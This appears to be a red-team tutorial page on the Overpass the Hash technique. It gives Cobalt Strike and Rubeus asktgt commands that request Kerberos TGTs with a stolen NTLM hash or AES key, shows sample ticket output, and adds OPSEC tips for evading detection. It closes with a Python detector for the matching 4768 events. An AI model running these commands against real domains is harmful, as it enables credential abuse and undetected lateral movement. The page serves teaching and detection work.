Overpass The Hash
Overpass The Hash is a technique that lets us request a Kerberos TGT for a user using their NTLM hash or AES key instead of their password.
Note: Elevated privileges are required to obtain a user's hash (for example, from LSASS), but they are not needed to request a Kerberos TGT with it.
Cobalt Strike - Rubeus w/ NTLM
beacon> execute-assembly C:\Tools\Rubeus.exe asktgt /user:robert /ntlm:2B576ACBE6BCFDA7294D6BD18041B8FE /nowrap
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 2B576ACBE6BCFDA7294D6BD18041B8FE
[*] Building AS-REQ (w/ preauth) for: 'dev.rotta.dev\robert'
[*] Using domain controller: 10.15.211.9:88
[09/01 10:24:04] [+] received output:
[+] TGT request successful!
[*] base64(ticket.kirbi):
ServiceName : krbtgt/dev.rotta.dev
ServiceRealm : DEV.ROTTA.DEV
UserName : robert
UserRealm : DEV.ROTTA.DEV
...
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : MkI1NzZBQ0JFNkJDRkRBNzI5NEQ2QkQxODA0MUI4RkU=
ASREP (key) : 2B576ACBE6BCFDA7294D6BD18041B8FE
Note: Now that we've obtained a TGT, it can be leveraged via Pass the Ticket.
OPSEC
Note: Using an NTLM hash results in a Kerberos exchange that uses RC4 (etype 0x17); the domain controller records this as the Ticket Encryption Type in its 4768 (Kerberos TGT requested) event. RC4 is considered a legacy encryption type and therefore often stands out as anomalous in a modern Windows environment, where AES (0x12) is the norm. It's better to request a TGT with the user's AES key than with their NTLM hash. The example below is better OPSEC.
Cobalt Strike - Rubeus w/ AES
beacon> execute-assembly C:\Tools\Rubeus.exe asktgt /user:robert /aes256:<aeshash> /nowrap
OPSEC
If no /domain is specified, Rubeus uses the FQDN of the domain this computer is in. Instead, we can force it to use the NetBIOS name with /domain:DEV.
The /opsec flag tells Rubeus to request the TGT in a way that results in the Ticket Options being 0x40810010, which is what a standard Windows client sends. The flag is meant to be used with an AES key (hence /aes256 below); requesting with RC4 would undo the point of it.
beacon> execute-assembly C:\Tools\Rubeus.exe asktgt /user:robert /aes256:<aeshash> /domain:DEV /opsec /nowrap
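The indicators in the two OPSEC notes above are visible from the DC's side, in the 4768 (Kerberos TGT requested) events. The script below is an added example, not code from the original page or from Rubeus: it parses 4768 events in the Windows event XML layout and flags an RC4 (0x17) encryption type, ticket options other than 0x40810010, and a supplied realm that is an FQDN rather than a NetBIOS name. The sample events, users, realms and IP addresses are constructed; the Data Name fields follow the real 4768 schema. The realm check is the weakest of the three and should be baselined against your own clients before alerting on it.

```python
"""Triage of Kerberos TGT requests (Security event ID 4768) for the OPSEC
indicators above: an RC4 exchange (etype 0x17), ticket options that differ
from a stock Windows client's 0x40810010, and an FQDN supplied realm.

Added example, not code from the original page or from Rubeus. The event
XML is constructed sample data: element and Data Name values follow the
real 4768 schema, the users, realms and addresses are made up.
"""
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Encryption types as logged in the 4768 TicketEncryptionType field.
ETYPES = {"0x11": "AES128", "0x12": "AES256", "0x17": "RC4-HMAC"}

# KDC options a stock Windows client puts in its AS-REQ; Rubeus /opsec
# sends the same value.
WINDOWS_CLIENT_TICKET_OPTIONS = 0x40810010


def parse_event(xml_text):
    """Return the EventData of a 4768 event as a dict, or None for other IDs."""
    root = ET.fromstring(xml_text)
    if root.findtext(f"{NS}System/{NS}EventID") != "4768":
        return None
    return {d.get("Name"): (d.text or "").strip() for d in root.iter(f"{NS}Data")}


def triage(event):
    """Return the list of indicators for one successful TGT request."""
    if event.get("Status", "") != "0x0":
        return []  # failed requests (sprays, lockouts) are a separate hunt
    reasons = []
    etype = event.get("TicketEncryptionType", "").lower()
    if etype == "0x17":
        reasons.append(f"{ETYPES[etype]} (0x17) TGT; AES is expected in a modern domain")
    options = int(event.get("TicketOptions", "0x0"), 16)
    if options != WINDOWS_CLIENT_TICKET_OPTIONS:
        reasons.append(f"ticket options 0x{options:08X} differ from the Windows client value 0x{WINDOWS_CLIENT_TICKET_OPTIONS:08X}")
    realm = event.get("TargetDomainName", "")
    if "." in realm:
        # Weaker signal: baseline against your own clients before alerting.
        reasons.append(f"supplied realm '{realm}' is an FQDN, not a NetBIOS name")
    return reasons


def triage_log(xml_events):
    """Return (user, source IP, indicators) for every flagged 4768 event."""
    findings = []
    for xml_text in xml_events:
        event = parse_event(xml_text)
        if event is None:
            continue
        reasons = triage(event)
        if reasons:
            findings.append((event.get("TargetUserName"), event.get("IpAddress"), reasons))
    return findings


def _event(event_id, user, realm, options, etype, ip, status="0x0"):
    """Build one constructed event in the Windows event XML layout."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>{event_id}</EventID></System>
  <EventData>
    <Data Name="TargetUserName">{user}</Data>
    <Data Name="TargetDomainName">{realm}</Data>
    <Data Name="ServiceName">krbtgt</Data>
    <Data Name="TicketOptions">{options}</Data>
    <Data Name="Status">{status}</Data>
    <Data Name="TicketEncryptionType">{etype}</Data>
    <Data Name="PreAuthType">2</Data>
    <Data Name="IpAddress">::ffff:{ip}</Data>
  </EventData>
</Event>"""


# Constructed sample log: an RC4 request with an FQDN realm, one that looks
# like a stock client, an AES request with non-default options, and a 4769
# (service ticket) event that must be skipped.
SAMPLE_EVENTS = [
    _event(4768, "robert", "DEV.ROTTA.DEV", "0x40810010", "0x17", "10.15.211.50"),
    _event(4768, "alice", "DEV", "0x40810010", "0x12", "10.15.211.51"),
    _event(4768, "robert", "DEV.ROTTA.DEV", "0x40800010", "0x12", "10.15.211.50"),
    _event(4769, "alice", "DEV", "0x40810000", "0x12", "10.15.211.51"),
]

if __name__ == "__main__":
    for user, ip, reasons in triage_log(SAMPLE_EVENTS):
        print(f"{user} from {ip}:")
        for reason in reasons:
            print("  -", reason)
```

On a real DC the same XML comes from Get-WinEvent (the ToXml() method on each record) or from a forwarded-event pipeline; the parser only needs the System/EventID and EventData/Data elements, so it works unchanged on exported events.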